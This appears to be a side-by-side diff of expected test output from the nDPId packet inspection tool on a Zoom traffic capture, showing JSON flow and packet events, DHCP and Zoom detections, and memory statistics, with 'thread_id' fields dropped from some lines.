00471{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":87,"source":"zoom.pcap","alias":"nDPId-test","flow_id":17,"flow_packet_id":2,"flow_last_seen":1569520469433,"flow_idle_time":120000,"pkt_oversize":false,"pkt_caplen":70,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":70,"pkt_l4_len":36,"thread_ts_msec":1569520469433,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA4ZPoAAEABiqDAqAF1ov8mDgMDkd4AAAAARQAAPMGZQAAuEf\/sov8mDsCoAXUNl11fACgAAA=="} 00471{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":87,"source":"zoom.pcap","alias":"nDPId-test","flow_id":17,"flow_packet_id":2,"flow_last_seen":1569520469433,"flow_idle_time":120000,"pkt_oversize":false,"pkt_caplen":70,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":70,"pkt_l4_len":36,"thread_ts_msec":1569520469433,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA4ZPoAAEABiqDAqAF1ov8mDgMDkd4AAAAARQAAPMGZQAAuEf\/sov8mDsCoAXUNl11fACgAAA=="}
00369{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":90,"source":"zoom.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":60,"pkt_type":34969,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":60,"pkt_l4_len":0,"thread_ts_msec":1569520469435,"pkt":"\/\/\/\/\/\/\/\/2A0X1lWriJklgAAA2A0X1lWrAACAAADYDRfWVauACAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"} 00355{"packet_event_id":1,"packet_event_name":"packet","packet_id":90,"source":"zoom.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":60,"pkt_type":34969,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":60,"pkt_l4_len":0,"thread_ts_msec":1569520469435,"pkt":"\/\/\/\/\/\/\/\/2A0X1lWriJklgAAA2A0X1lWrAACAAADYDRfWVauACAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"}
00196{"basic_event_id":5,"basic_event_name":"Unknown packet type","datalink":1,"thread_id":0,"packet_id":90,"source":"zoom.pcap","alias":"nDPId-test","layer_type":34969,"global_ts_msec":1569520469782} 00182{"basic_event_id":5,"basic_event_name":"Unknown packet type","datalink":1,"packet_id":90,"source":"zoom.pcap","alias":"nDPId-test","layer_type":34969,"global_ts_msec":1569520469782}
00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":91,"source":"zoom.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569520469797,"flow_last_seen":1569520469797,"flow_idle_time":180000,"flow_min_l4_payload_len":279,"flow_max_l4_payload_len":279,"flow_tot_l4_payload_len":279,"flow_avg_l4_payload_len":279,"midstream":0,"thread_ts_msec":1569520469797,"l3_proto":"ip4","src_ip":"192.168.0.1","dst_ip":"255.255.255.255","src_port":68,"dst_port":67,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":91,"source":"zoom.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569520469797,"flow_last_seen":1569520469797,"flow_idle_time":180000,"flow_min_l4_payload_len":279,"flow_max_l4_payload_len":279,"flow_tot_l4_payload_len":279,"flow_avg_l4_payload_len":279,"midstream":0,"thread_ts_msec":1569520469797,"l3_proto":"ip4","src_ip":"192.168.0.1","dst_ip":"255.255.255.255","src_port":68,"dst_port":67,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
00819{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":91,"source":"zoom.pcap","alias":"nDPId-test","flow_id":18,"flow_packet_id":1,"flow_last_seen":1569520469797,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":321,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":321,"pkt_l4_len":287,"thread_ts_msec":1569520469797,"pkt":"\/\/\/\/\/\/\/\/2A0X1lWrCABFAAEzBkxAAEARcsXAqAAB\/\/\/\/\/wBEAEMBHwAAAQEGABIog9sAAIAAAAAAAAAAAAAAAAAAAAAAANgNF9ZVqwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABjglNjNQEBNwIBAwwJVEwtU0cxMTZFPAlUTC1TRzExNkU9BwHYDRfWVav\/"} 00819{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":91,"source":"zoom.pcap","alias":"nDPId-test","flow_id":18,"flow_packet_id":1,"flow_last_seen":1569520469797,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":321,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":321,"pkt_l4_len":287,"thread_ts_msec":1569520469797,"pkt":"\/\/\/\/\/\/\/\/2A0X1lWrCABFAAEzBkxAAEARcsXAqAAB\/\/\/\/\/wBEAEMBHwAAAQEGABIog9sAAIAAAAAAAAAAAAAAAAAAAAAAANgNF9ZVqwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABjglNjNQEBNwIBAwwJVEwtU0cxMTZFPAlUTC1TRzExNkU9BwHYDRfWVav\/"}
00716{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":91,"source":"zoom.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569520469797,"flow_last_seen":1569520469797,"flow_idle_time":180000,"flow_min_l4_payload_len":279,"flow_max_l4_payload_len":279,"flow_tot_l4_payload_len":279,"flow_avg_l4_payload_len":279,"midstream":0,"thread_ts_msec":1569520469797,"l3_proto":"ip4","src_ip":"192.168.0.1","dst_ip":"255.255.255.255","src_port":68,"dst_port":67,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DHCP","breed":"Acceptable","category":"Network"},"dhcp": {"hostname":"tl-sg116e","fingerprint":"1,3","class_ident":"TL-SG116E"}} 00716{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":91,"source":"zoom.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569520469797,"flow_last_seen":1569520469797,"flow_idle_time":180000,"flow_min_l4_payload_len":279,"flow_max_l4_payload_len":279,"flow_tot_l4_payload_len":279,"flow_avg_l4_payload_len":279,"midstream":0,"thread_ts_msec":1569520469797,"l3_proto":"ip4","src_ip":"192.168.0.1","dst_ip":"255.255.255.255","src_port":68,"dst_port":67,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DHCP","breed":"Acceptable","category":"Network"},"dhcp": {"hostname":"tl-sg116e","fingerprint":"1,3","class_ident":"TL-SG116E"}}
@@ -159,8 +159,8 @@
00641{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":386,"source":"zoom.pcap","alias":"nDPId-test","flow_id":31,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569520471748,"flow_last_seen":1569520471748,"flow_idle_time":180000,"flow_min_l4_payload_len":107,"flow_max_l4_payload_len":107,"flow_tot_l4_payload_len":107,"flow_avg_l4_payload_len":107,"midstream":0,"thread_ts_msec":1569520471748,"l3_proto":"ip4","src_ip":"192.168.1.117","dst_ip":"109.94.160.99","src_port":58327,"dst_port":8801,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Zoom","breed":"Acceptable","category":"Video"}} 00641{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":386,"source":"zoom.pcap","alias":"nDPId-test","flow_id":31,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569520471748,"flow_last_seen":1569520471748,"flow_idle_time":180000,"flow_min_l4_payload_len":107,"flow_max_l4_payload_len":107,"flow_tot_l4_payload_len":107,"flow_avg_l4_payload_len":107,"midstream":0,"thread_ts_msec":1569520471748,"l3_proto":"ip4","src_ip":"192.168.1.117","dst_ip":"109.94.160.99","src_port":58327,"dst_port":8801,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Zoom","breed":"Acceptable","category":"Video"}}
00481{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":395,"source":"zoom.pcap","alias":"nDPId-test","flow_id":31,"flow_packet_id":2,"flow_last_seen":1569520471780,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":77,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":77,"pkt_l4_len":43,"thread_ts_msec":1569520471780,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA\/ukJAADURu4xtXqBjwKgBdSJh49cAK4mJAgABfUZNNf\/9ojRJXQ1tO1HolgBaDj4AegAqAAAAAAAAAAA="} 00481{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":395,"source":"zoom.pcap","alias":"nDPId-test","flow_id":31,"flow_packet_id":2,"flow_last_seen":1569520471780,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":77,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":77,"pkt_l4_len":43,"thread_ts_msec":1569520471780,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA\/ukJAADURu4xtXqBjwKgBdSJh49cAK4mJAgABfUZNNf\/9ojRJXQ1tO1HolgBaDj4AegAqAAAAAAAAAAA="}
00455{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":396,"source":"zoom.pcap","alias":"nDPId-test","flow_id":31,"flow_packet_id":3,"flow_last_seen":1569520471780,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":21,"thread_ts_msec":1569520471780,"pkt":"KDc3AG3IEBMx8Tl2CABFAAApukNAADURu6FtXqBjwKgBdSJh49cAFe6ZAwAAAAF2Ko10AFoOPgAAAAAA"} 00455{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":396,"source":"zoom.pcap","alias":"nDPId-test","flow_id":31,"flow_packet_id":3,"flow_last_seen":1569520471780,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":21,"thread_ts_msec":1569520471780,"pkt":"KDc3AG3IEBMx8Tl2CABFAAApukNAADURu6FtXqBjwKgBdSJh49cAFe6ZAwAAAAF2Ko10AFoOPgAAAAAA"}
00370{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":398,"source":"zoom.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":60,"pkt_type":34969,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":60,"pkt_l4_len":0,"thread_ts_msec":1569520471780,"pkt":"\/\/\/\/\/\/\/\/2A0X1lWriJklgAAA2A0X1lWrAACAAADYDRfWVauACAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"} 00356{"packet_event_id":1,"packet_event_name":"packet","packet_id":398,"source":"zoom.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":60,"pkt_type":34969,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":60,"pkt_l4_len":0,"thread_ts_msec":1569520471780,"pkt":"\/\/\/\/\/\/\/\/2A0X1lWriJklgAAA2A0X1lWrAACAAADYDRfWVauACAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"}
00197{"basic_event_id":5,"basic_event_name":"Unknown packet type","datalink":1,"thread_id":0,"packet_id":398,"source":"zoom.pcap","alias":"nDPId-test","layer_type":34969,"global_ts_msec":1569520471784} 00183{"basic_event_id":5,"basic_event_name":"Unknown packet type","datalink":1,"packet_id":398,"source":"zoom.pcap","alias":"nDPId-test","layer_type":34969,"global_ts_msec":1569520471784}
00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":425,"source":"zoom.pcap","alias":"nDPId-test","flow_id":32,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569520471915,"flow_last_seen":1569520471915,"flow_idle_time":180000,"flow_min_l4_payload_len":107,"flow_max_l4_payload_len":107,"flow_tot_l4_payload_len":107,"flow_avg_l4_payload_len":107,"midstream":0,"thread_ts_msec":1569520471915,"l3_proto":"ip4","src_ip":"192.168.1.117","dst_ip":"109.94.160.99","src_port":60620,"dst_port":8801,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":425,"source":"zoom.pcap","alias":"nDPId-test","flow_id":32,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569520471915,"flow_last_seen":1569520471915,"flow_idle_time":180000,"flow_min_l4_payload_len":107,"flow_max_l4_payload_len":107,"flow_tot_l4_payload_len":107,"flow_avg_l4_payload_len":107,"midstream":0,"thread_ts_msec":1569520471915,"l3_proto":"ip4","src_ip":"192.168.1.117","dst_ip":"109.94.160.99","src_port":60620,"dst_port":8801,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
00579{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":425,"source":"zoom.pcap","alias":"nDPId-test","flow_id":32,"flow_packet_id":1,"flow_last_seen":1569520471915,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":149,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":149,"pkt_l4_len":115,"thread_ts_msec":1569520471915,"pkt":"EBMx8Tl2KDc3AG3ICABFAACHOsEAAEARb8bAqAF1bV6gY+zMImEAcx+TAQACgEJ0mpHOZDa3wq7Yfnt8kAAAAAAAAAACAHoA0QB6ANEAAABAz+pIvn76v2yDYA2gAvW2g1TH36+BBcgmmBwGC4A2voI37csLDeuB1cbZ5dS3SDby7ZAjUH7\/6+f4krtKebNFkQAAAAA="} 00579{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":425,"source":"zoom.pcap","alias":"nDPId-test","flow_id":32,"flow_packet_id":1,"flow_last_seen":1569520471915,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":149,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":149,"pkt_l4_len":115,"thread_ts_msec":1569520471915,"pkt":"EBMx8Tl2KDc3AG3ICABFAACHOsEAAEARb8bAqAF1bV6gY+zMImEAcx+TAQACgEJ0mpHOZDa3wq7Yfnt8kAAAAAAAAAACAHoA0QB6ANEAAABAz+pIvn76v2yDYA2gAvW2g1TH36+BBcgmmBwGC4A2voI37csLDeuB1cbZ5dS3SDby7ZAjUH7\/6+f4krtKebNFkQAAAAA="}
00641{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":425,"source":"zoom.pcap","alias":"nDPId-test","flow_id":32,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569520471915,"flow_last_seen":1569520471915,"flow_idle_time":180000,"flow_min_l4_payload_len":107,"flow_max_l4_payload_len":107,"flow_tot_l4_payload_len":107,"flow_avg_l4_payload_len":107,"midstream":0,"thread_ts_msec":1569520471915,"l3_proto":"ip4","src_ip":"192.168.1.117","dst_ip":"109.94.160.99","src_port":60620,"dst_port":8801,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Zoom","breed":"Acceptable","category":"Video"}} 00641{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":425,"source":"zoom.pcap","alias":"nDPId-test","flow_id":32,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569520471915,"flow_last_seen":1569520471915,"flow_idle_time":180000,"flow_min_l4_payload_len":107,"flow_max_l4_payload_len":107,"flow_tot_l4_payload_len":107,"flow_avg_l4_payload_len":107,"midstream":0,"thread_ts_msec":1569520471915,"l3_proto":"ip4","src_ip":"192.168.1.117","dst_ip":"109.94.160.99","src_port":60620,"dst_port":8801,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Zoom","breed":"Acceptable","category":"Video"}}
@@ -221,6 +221,6 @@
~~ total memory freed........: 4867691 bytes ~~ total memory freed........: 4867691 bytes
~~ total allocations/frees...: 102013/102013 ~~ total allocations/frees...: 102013/102013
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
~~ json string min len.......: 201 chars ~~ json string min len.......: 187 chars
~~ json string max len.......: 2328 chars ~~ json string max len.......: 2328 chars
~~ json string avg len.......: 1264 chars ~~ json string avg len.......: 1257 chars